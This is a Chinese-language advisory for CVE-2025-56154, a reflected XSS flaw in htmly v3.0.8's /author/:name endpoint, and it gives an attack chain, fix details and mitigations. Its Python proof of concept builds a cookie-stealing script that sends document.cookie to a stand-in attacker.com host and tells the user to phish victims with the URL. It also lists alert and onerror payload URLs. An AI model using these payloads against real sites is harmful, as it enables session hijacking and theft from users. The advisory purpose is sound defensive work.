CVE-2025-56154：htmly 跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2025-56154

漏洞类型

跨站脚本攻击（XSS）

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

htmly

漏洞概述

CVE-2025-56154 是 htmly 内容管理系统 v3.0.8 版本中存在的一个反射型跨站脚本（Reflected XSS）漏洞。该漏洞位于应用程序的 /author/:name 端点，攻击者可以通过构造恶意的 URL，将包含 JavaScript 代码的 payload 注入到 name 参数中。由于服务端未对用户输入进行充分的过滤和转义处理，恶意脚本将直接被反射回受害者的浏览器中执行。

htmly 是一款轻量级的 PHP 开源博客/内容管理系统，因其简洁易用而受到部分个人站长和小型团队的青睐。该漏洞的存在使得攻击者能够在受害用户的浏览器上下文中执行任意 JavaScript 代码，可能导致用户会话劫持、敏感信息窃取、钓鱼攻击、恶意页面重定向等一系列安全问题。CVSS 3.1 评分为 6.1 分，属于中危级别。虽然该漏洞需要用户交互（UI:R）才能触发，但由于无需任何认证（PR:N）且可通过网络远程利用（AV:N），其潜在威胁仍然不可忽视。

该漏洞已于 htmly v3.0.9 版本中修复，修复方式为对 name 参数进行了适当的 HTML 实体编码和输入过滤。建议所有使用 htmly v3.0.8 及更早版本的用户尽快升级至最新版本以消除安全隐患。

技术细节

该漏洞属于典型的反射型 XSS（Reflected Cross-Site Scripting），其根本原因在于 htmly v3.0.8 的 /author/:name 路由处理逻辑中，未对用户通过 URL 路径传入的 name 参数进行充分的输出编码和输入验证。

从技术层面分析，当用户访问类似 https://target.com/author/<script>alert(document.cookie)</script> 的 URL 时，服务端将 name 参数的值直接嵌入到返回的 HTML 页面中，而没有对尖括号、引号等特殊字符进行 HTML 实体编码（如将 < 转换为 <）。这导致攻击者注入的 HTML 标签和 JavaScript 代码能够被浏览器正常解析和执行。

利用方式上，攻击者首先需要构造一个包含恶意 JavaScript payload 的 URL。由于该漏洞无需认证即可触发，攻击者可以通过社交工程手段（如钓鱼邮件、即时通讯消息、论坛帖子等）诱导受害者点击恶意链接。一旦受害者点击链接，其浏览器将在 htmly 网站的上下文中执行攻击者注入的脚本，攻击者可以借此窃取用户的 Cookie、会话令牌，或者通过 DOM 操作伪造登录表单进行钓鱼攻击。此外，攻击者还可以利用该漏洞进行恶意重定向，将受害者引导至含有恶意软件的网站。

修复方面，htmly v3.0.9 版本通过在模板渲染层面对 name 参数进行 HTML 实体编码（如使用 htmlspecialchars() 函数）来阻止恶意脚本注入。同时增加了输入白名单校验，限制 name 参数仅接受合法的字符集。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过搜索引擎、Shodan 等工具识别运行 htmly v3.0.8 及以下版本的网站目标，确认目标使用存在漏洞的版本。

STEP 2

步骤2：构造恶意 URL

攻击者构造包含恶意 JavaScript payload 的 URL，利用 /author/:name 端点的 name 参数未过滤的特性，将 <script> 标签或事件处理器注入到 URL 路径中。

STEP 3

步骤3：投递钓鱼链接

攻击者通过钓鱼邮件、社交媒体、即时通讯工具或论坛等方式，将恶意链接发送给目标用户，诱导其点击。

STEP 4

步骤4：触发漏洞

受害者点击恶意链接后，浏览器向目标 htmly 网站发送请求，服务端将未经转义的恶意 payload 嵌入 HTML 响应中返回。

STEP 5

步骤5：执行恶意脚本

浏览器解析返回的 HTML，执行攻击者注入的 JavaScript 代码，可能导致 Cookie 窃取、会话劫持、钓鱼表单注入或恶意重定向等攻击。

STEP 6

步骤6：数据外泄

攻击者通过窃取的 Cookie 或会话令牌冒充受害者身份登录后台，执行未授权操作或窃取敏感数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

## CVE-2025-56154 - htmly Reflected XSS PoC
## Affected: htmly <= v3.0.8
## Endpoint: /author/:name
## Author: akinerkisa

# Basic PoC - Cookie stealing via reflected XSS
# The payload is injected into the /author/:name endpoint

import requests

TARGET_URL = "http://target-htmly-site.com"
ATTACKER_SERVER = "http://attacker.com/steal"

# Malicious JavaScript payload to steal cookies
payload = f'<script>document.location="{ATTACKER_SERVER}?c="+document.cookie</script>'

# Construct the exploit URL
exploit_url = f"{TARGET_URL}/author/{payload}"

print(f"[+] Exploit URL: {exploit_url}")
print("[+] Send this URL to the victim via phishing email/messaging")

# Verify the vulnerability
response = requests.get(exploit_url)
if payload in response.text:
    print("[+] Vulnerability confirmed! Payload reflected without sanitization.")
else:
    print("[-] Payload not found in response. Target may be patched.")

## Alternative simple PoC URL:
## http://target-htmly-site.com/author/<script>alert('XSS')</script>
## http://target-htmly-site.com/author/<img src=x onerror=alert(document.cookie)>

影响范围

htmly <= v3.0.8

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）在 Web 服务器层面配置 URL 重写规则，拦截 /author/ 路径中包含 <、>、"、'、(、)、script、onerror 等可疑字符的请求；2）部署 Web 应用防火墙（WAF）规则，检测和阻断常见的 XSS 攻击向量；3）配置 Content Security Policy（CSP）响应头，限制内联脚本执行，例如设置 Content-Security-Policy: script-src 'self'；4）为所有会话 Cookie 设置 HttpOnly 和 Secure 标志，降低 Cookie 被窃取的风险；5）对用户进行安全意识培训，提醒其不要点击来源不明的链接。